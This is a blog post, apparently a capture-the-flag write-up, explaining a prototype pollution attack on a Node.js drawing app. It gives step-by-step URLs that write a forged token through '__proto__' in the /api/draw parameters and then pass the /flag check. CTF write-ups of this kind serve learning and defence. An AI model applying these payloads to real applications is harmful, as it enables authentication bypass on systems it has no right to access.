Open in app

Sign in

Write

Sign in

Challenge 2: Time To Draw

Ditto
3 min readJan 21, 2021

--

This is my first time looking at a Prototype Pollution Challenge. I guess a recurring theme/lesson is to always go back to basics and start looking at what the user can control.

Source code:

cddc12346/RandomCTFs

Contribute to cddc12346/RandomCTFs development by creating an account on GitHub.

github.com

With that lesson in mind, lets start looking at what the user can control. Searching for query in notepad++, below are the results and the variables that we can control.

Variables we can control

Looking deeper into one of them at /api/draw, we see that our variables are passed into canvas.

/api/draw source code

A normal use of this is when the user sends this URL, passing x=1, y=1 & color = red:

http://192.168.106.153:3000/api/draw?x=1&y=1&color=red

which would output this result on the canvas:

The problem arises when the attacker supplies a malicious payload which corrupts the object. Say the attacker sends this URL:

http://192.168.106.153:3000/api/draw?x=__proto&y=token&color=aaaaa

This will transformed into this piece of code:

canva[__proto__][token] = aaaaa

which corrupts the UserData.Token object that is used to verify our identity when we visit the /flag subdomain. The attack is also possible because UserData.Token does not exist if the user is not an admin.

token only set when we enter the branch as admin

Some random testing that might be useful:

Testing Prototype Pollution with source code below
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body><h1>This is a Heading</h1>
<p>This is a paragraph.</p></body>
</html><script>let canvas = {
    ...Array(128).fill(null).map(() => new Array(128).fill("#FFFFFF"))
};let userData = { isGuest: true };
</script>

Moving on to the exploit:

  1. we navigate and send token=aaaaa:
http://192.168.106.153:3000/flag?token=aaaaa

At /flag, UserData.token is still undefined.

2. navigate to /api/draw and overwrite UserData.token

http://192.168.106.153:3000/api/draw?x=__proto__&y=token&color=bbbbb

Now back to /flag, UserData.token has been overwriten with what we specified in color!

3. Exploit has already worked!

In order to bypass the checks, we need to generate a 16 character token and append it with our ip address and hashing it. I modified the index.js to do it for me.

modified index.js
highlighted = the hash generated with a token of 16 * ‘a’
http://192.168.106.153:3000/api/draw?x=__proto__&y=token&color=3a3f5db44c2c80b7c693f6b6d3aea621ec0cb8259686094d3232b2dd1b1e3026
Overwritten!
PWN-ED!!

All thanks to Seraphin who shared the source code and his solution. Didnt have the time to look into the challenge. You may refer to his explanation!!

Seraphin-/ctf

There are 2 bugs. The first is the userData object doesn't contain a token when the user isn't admin. The second is…

github.com

Good to know:

function person(fullName) {
 this.fullName = fullName;
}var person1 = new person(“aaaaaaa”);
person1.__proto__.token = ‘cccc’;
let canvas = {
 …Array(128).fill(null).map(() => new Array(128).fill(“#FFFFFF”))
};let userData = { isGuest: true };
Difference in level between the class person and canvas

Person need two __proto__ to access the base object while canvas only require one!

Web
Ctf
Capture The Flag
Nodejs
Prototype Pollution

--

--

Ditto
Ditto

Written by Ditto

11 Followers
2 Following

Welcome!

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams